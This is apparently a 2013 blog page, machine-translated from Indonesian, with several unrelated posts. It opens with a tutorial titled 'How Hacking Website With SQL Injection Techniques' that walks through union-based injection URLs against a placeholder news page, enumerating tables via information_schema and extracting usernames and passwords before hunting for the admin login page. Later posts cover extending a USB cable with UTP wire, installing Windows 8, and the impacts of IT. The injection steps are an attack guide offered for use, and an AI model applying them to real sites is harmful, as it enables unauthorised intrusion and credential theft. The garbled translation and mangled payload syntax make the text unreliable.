Tuesday, March 5, 2013

How Hacking Website With SQL Injection Techniques

Understanding SQL Injection, SQL Injection is the hacking is done by modifying the client applied the SQL commands that exist in memory and also the client application techniques that exploit the web application in it using a database for data storage.
You need to know before making a SQL Injection in MySQL:character: 'or -comments: / * or -information_schema for version: MySQL version 5.x, no support for MySQL version 4.x
[Step 1]

Look for targets
For example: [site] / berita.php? Id = 100

Add character 'at the end of the url or add character "-" to see if there was an error message.
[Site] / berita.php? Id = 100 'or
[Site] / berita.php? Id = -100
So the error message appears as follows [many more]
[Step 2]

Finding and counting the number of tables that exist in the database ...
use the command: order by


[Site] / berita.php? Id = -100 + order + by +1- - or
[Site] / berita.php? Id = -100 + order + by +1 / *

Please check it step by step (satupersatu) ...
For example:

[Site] / berita.php? Id = -100 + order + by +1- -
[Site] / berita.php? Id = -100 + order + by +2- -
[Site] / berita.php? Id = -100 + order + by +3- -
[Site] / berita.php? Id = -100 + order + by +4- -

So there is an error or missing error message ...
For example: [site] / berita.php? Id = -100 + order + by +9- -

Means that we take is up to number 8
Being a [site] / berita.php? Id = -100 + order + by +8- -
[Step 3]

to issue any number that appears use the union
because it was error to number 9
then: [site] / berita.php? id = -100 + union + select +1,2,3,4,5,6,7,8 -

ok is like that out number 5

use the version () or @ @ version to check which version of sql command input diapakai TSB on nagka wrote out earlier
eg: [site] / berita.php? id = -100 + union + select +1,2,3,4, version () ,6,7,8 - or
[Site] / berita.php? Id = -100 + union + select +1,2,3,4, @ @ version ,6,7,8 -

See the version used version 4 se'umpama leave it because in version 4 we have to guess their own table and column on the web because it can not use command + From INFORMATION_SCHEMA ..

For version 5 means you are lucky not to have to guess the table and column as version 4 as in version 5 can use command + From INFORMATION_SCHEMA ..
[Step 4]

To display the table on the web is
commands entered on table_name >>> yangg figures out earlier
command + from + information_schema.tables / * >>> inserted after the last digit


[Site] / berita.php? Id = -100 + union + select +1,2,3,4, table_name, 6,7,8 + from + information_schema.tables--

Se'umpama table that appears is "admin"
[Step 5]

to display all the contents of the table are
command group_concat (table_name) >>> included in the numbers out earlier
command + from + information_schema.tables + where + table_schema = database () >>> inserted after the last digit

[Step 6]

Command group_concat (column_name) >>> included in the numbers out earlier
+ command + from + where + table_name information_schema.columns = 0xhexa - >>> inserted after the last digit


At this stage you shall mengextrak word on the contents of the table to hexadecimal by converting
Websites that are used for the conversion:


Examples of words you want to convert the admin then it will be 61646D696E

[Step 7]

Bring up what had been removed from the table that is the way

concat_ws command (0x3a, the contents of that column would be issued) >>> included in the figures that came out earlier
command + from + (derived table name) >>> inserted after the last digit


[Site] / berita.php? Id = -100 + union + select +1,2,3,4, concat_ws (0x3a, the content column), 6,7,8 + from + (a name derived table) -

An example is the word that comes out id, username, password


[Step 8]

The last stage look for admin or login page.
A few of my current post on How to Hacking Website With SQL Injection Techniques, tutorial hacking others will follow, so stop by continued here ya: D
Source: Hacker Newbie

USB Extender Extend USB Cables UTP Cables

On this occasion I will try to write and explains how to create an extension using USB Extender with UTP cable, in order to further clarify this writing, I have also included an image / photo from the photo album Egoen Pa. Before her I thank you for Mr. Goen, who always gives a new inspirasi2.
Ok, Why do we need a long USB cable? Because the Usb cable is available in the Market usually a maximum of only 1 to 1.5 mtr. Despite the fact there are 10-20 mtr, but rare and usually requires a USB repeater (klo ga wrong it's called) to strengthen the flow of data in the USB that long. the problem is the USB repeater price is quite expensive for me to buy, luckily Mr. Goen provide a solution to extend a USB cable using UTP cable. Because of its extended klo USB cable with UTP for 20 mtr likely still be without USB Repeater (although it still depends on the same USB on motherboard too). Usually the purpose of a long USB cable is used for the installation of an outdoor antenna WiFi USB, printer extension cable, USB HUB, etc ...
Disaranakan using USB ver 1.0, because based on experience. This trick almost always works on USB ver 1.0
Well, we went straight to the practice alone. Materials and equipment that need to be prepared are:
1. UTP cable, its length as necessary. But I suggest no more than 20 meters. If more than 20 meters, will be required usb repeater / usb extender to strengthen the flow of data and power.
2. USB cable
3. Rubber tape
4. Thermofit / condom cable (optional)
5. Small pvc pipe
6. scissors
7. solder

Once all the ingredients are prepared, the first thing to do is peel UTP cable at both its ends. And is divided into 4 parts as shown below. Her division, orange wires in cables joining the white-orange, white-blue, green and the rest of the 4 wires are merged into one.

Furthermore, usb cable that had been prepared earlier cut widened 2 parts 

Then peel the ends, as shown below: 

The next stage, enter a small pvc pipe / tube for protective connection to each end of the Bakel UTP Then peel ends, as shown below: 

And, as well as on the part of its usb cable. Enter a condom wrapper on each piece cable USB cable

Next, connect the UTP cable with a USB cable, the order as shown below, it is recommended to use solder, because of my experience when I do not use solder, the USB device is not detected by the computer even though it is set to USB version 1.0:

After all the wires are connected, use condom wrapper connection cable / thermofit.

And after that, wrap a connection was with a small pvc pipe

Now, the USB cable is ready to be used for the purpose of using a USB WiFi antenna Wajanbolic / USB WLAN

May be useful.
Yusda R. Noor
YM: yusda_46

Sunday, March 3, 2013

Step2 How to Install windows 8 (complete with pictures)

For those who still do not know langkah2 install windows 8, either using a CD / DVD or use USB flash drive, following langkah2 to install windows 8 developer preview edition of microsoft. Windows 8 Developer Edition is a pre-beta version of microsoft for testing and development purposes. This is not recommended to install on a pc that is still in active use. If there is a plan to create a dual boot, make sure you provide the primary partition more than 20GB. and if there are plans for a clean installation, make sure the backup first file2nya then newly formatted his hard drive C, and then install clean her windows 8.

1. Boot your computer with the Windows 8 Developer installation media. 
2. It may take several minutes to load the files, and then it will take you to the installation screen. Select the appropriate option and click Next.
3. Now click on "Install Now" to continue

4. check "Accept the terms and conditions" and then click "Next".

5. Here we can choose this option if you want to upgrade our windows to windows 8 Developer Edition or want to do a clean install. Select the Custom (Advanced) to continue with a clean installation.

6. On this screen you can select the drive you want to install, here we have the ability to manage disks, format, create partition, etc. If you are planning to setup a dual boot then you can select a different drive. After you configure the drive click "Next"

7. That alone will now begin the installation process, wait for it to finish that takes 10 minutes to 1 hour depending on the hardware configuration.

8.  After completing the installation your computer will reboot and will prepare pengaturan2. So please wait a moment.

 9. Now it will take you to personalize your desktop settings. Please select "Express settings" on the screen that contained a description of what the setting will be done.

 10. Unlike other operating systems, the Windows 8 you can login using a Windows Live account. So, you can enter your Windows Live account information.

If you do not want to use these login methods, please click on the "I do not want to log in with a Windows Live ID".

You can select "Local account" to create a Username and Password to login to your Windows.
 Once all the information has been entered, click "Next".

11. Now Windows will configure your settings

Once everything is in the setup, then we are treated to views Desktop Windows 8.

Congratulations! You have now successfully installed the Windows 8 Developer edition on your computer


Positive & Negative Impact of Information Technology Development

Development of information technology has been so rapid that it is difficult for us to control it. Almost every second of Information Technology products created around the world. We should appreciate the development of Information Technology because it certainly will increasingly assist human life. Positive and negative impacts of the use of IT is certainly there and naturally we are aware of this.

     Here are some things that positively impact the development of Information Technology.

         1. Simplify and speed up access to the information we need.
         2. Simplify and accelerate the delivery or dissemination.
         3. Facilitate transactions for companies or individual business interests.
         4. Facilitate the completion of tasks or jobs.
         5. Facilitate the communication process is not blocked time and place.
         6. Widespread use of information technology job openings IT or other types of new jobs.

     Meanwhile, the negative impact of the development of Information Technology among others,

         1. The issue of racial intolerance, violence and pornography become commonplace.
         2. Ease of transaction trigger illicit businesses such as drugs and black market or illegal products.
         3. The fraudsters and criminals arose, especially in the case of online transactions.
         4. The emergence of cultural plagiarism or plagiarism other people's work.

     All policies must be followed or the development of positive and negative sides are included in the development of information technology in our lives and our own should be aware of the phenomenon that occurs in order to minimize the negative side.
